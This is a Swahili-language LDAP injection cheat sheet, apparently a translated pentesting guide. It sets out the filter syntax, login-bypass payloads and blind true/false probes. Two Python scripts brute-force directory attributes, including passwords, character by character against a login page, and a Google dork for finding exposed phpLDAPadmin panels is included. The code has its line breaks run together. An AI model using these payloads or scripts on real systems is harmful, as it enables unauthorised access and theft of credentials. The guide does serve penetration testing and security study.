Kuingiza LDAP ni shambulio linalolenga programu za wavuti ambazo hujenga taarifa za LDAP kutoka kwa mwingiliano wa mtumiaji. Hutokea wakati programu haifanyi usafi ipasavyo wa mwingiliano, kuruhusu wadukuzi kudhibiti taarifa za LDAP kupitia proksi ya ndani, ikisababisha ufikiaji usioruhusiwa au upangilio wa data.
Kichujio = ( filtercomp )
Filtercomp = na / au / si / kitu
Na = & filterlist
Au = |filterlist
Si = ! filter
Filterlist = 1*filter
Kitu= rahisi / kujitokeza / kipande
Rahisi = sifa filtertype kauli
Filtertype = '=' / '~=' / '>=' / '<='Kujitokeza = sifa = *
Kipande = sifa ”=” [mwanzo] * [mwisho]
Mwanzo = kauli
Mwisho = kauli
(&) = Halisi KWELI
(|) = Halisi UONGO
Kwa mfano:
(&(!(objectClass=Impresoras))(uid=s*))(&(objectClass=user)(uid=*))
Unaweza kupata ufikiaji kwenye database, na hii inaweza kuwa na taarifa za aina nyingi tofauti.
OpenLDAP: Ikiwa filta 2 zinawasili, inatekeleza tu ya kwanza.
ADAM au Microsoft LDS: Pamoja na filta 2 hutoa kosa.
SunOne Directory Server 5.0: Inatekeleza filta zote mbili.
Ni muhimu sana kutuma filta na muundo sahihi au kosa litatupwa. Ni bora kutuma filta moja tu.
Filta lazima ianze na: & au |
Mfano: (&(directory=val1)(folder=public))
Kisha: (&(objectClass=*)(ObjectClass=*)) itakuwa filta ya kwanza (ile inayotekelezwa).
Kupuuza Kuingia
LDAP inasaidia miundo kadhaa ya kuhifadhi nywila: wazi, md5, smd5, sh1, sha, crypt. Kwa hivyo, inaweza kuwa kwamba bila kujali unachoweka ndani ya nywila, inahashishwa.
user=*password=*--> (&(user=*)(password=*))# The asterisks are great in LDAPi
user=admin)(&)password=pwd--> (&(user=admin)(&))(password=pwd) #Can through an error
username=admin)(!(&(|pass=any))--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
Unaweza kulazimisha majibu ya Uongo au Kweli kuchunguza ikiwa data yoyote imerudishwa na kuthibitisha uwezekano wa Kuingiza kipofu cha LDAP:
#This will result on True, so some information will be shownPayload:*)(objectClass=*))(&objectClass=voidFinalquery: (&(objectClass=*)(objectClass=*))(&objectClass=void )(type=Pepi*))
#This will result on True, so no information will be returned or shownPayload:void)(objectClass=void))(&objectClass=voidFinalquery: (&(objectClass=void)(objectClass=void))(&objectClass=void )(type=Pepi*))
Poteza data
Unaweza kurudia herufi za ascii, tarakimu na alama:
Vitu vya LDAP vina sifa kadhaa kwa chaguo-msingi ambazo zinaweza kutumika kuokoa habari. Unaweza kujaribu kufanya nguvu zote kwenye hizo ili kutoa habari hiyo. Unaweza kupata orodha ya sifa za LDAP za chaguo-msingi hapa.
#!/usr/bin/python3import requestsimport stringfrom time import sleepimport sysproxy ={"http":"localhost:8080"}url ="http://10.10.10.10/login.php"alphabet = string.ascii_letters + string.digits +"_@{}-/()!\"$%=^[]:;"attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]
for attribute in attributes:#Extract all attributesvalue =""finish =Falsewhilenot finish:for char in alphabet:#In each possition test each possible printable charquery =f"*)({attribute}={value}{char}*"data ={'login':query,'password':'bla'}r = requests.post(url, data=data, proxies=proxy)sys.stdout.write(f"\r{attribute}: {value}{char}")#sleep(0.5) #Avoid brute-force bansif"Cannot login"in r.text:value +=str(char)breakif char == alphabet[-1]:#If last of all the chars, then, no more chars in the valuefinish =Trueprint()
Mchanganyiko Maalum wa Kuingiza LDAP kwa Kipofu (bila "*")
#!/usr/bin/python3import requests, stringalphabet = string.ascii_letters + string.digits +"_@{}-/()!\"$%=^[]:;"flag =""for i inrange(50):print("[i] Looking for number "+str(i))for char in alphabet:r = requests.get("http://ctf.web??action=dir&search=admin*)(password="+ flag + char)if ("TRUE CONDITION"in r.text):flag += charprint("[+] Flag: "+ flag)break
Google Dorks
intitle:"phpLDAPadmin"inurl:cmd.php
Payloads Zaidi
Ikiwa una nia katika kazi ya udukuzi na kudukua yasiyodukuzika - tunakupa kazi! (ujuzi wa kuzungumza na kuandika Kipolishi vizuri unahitajika).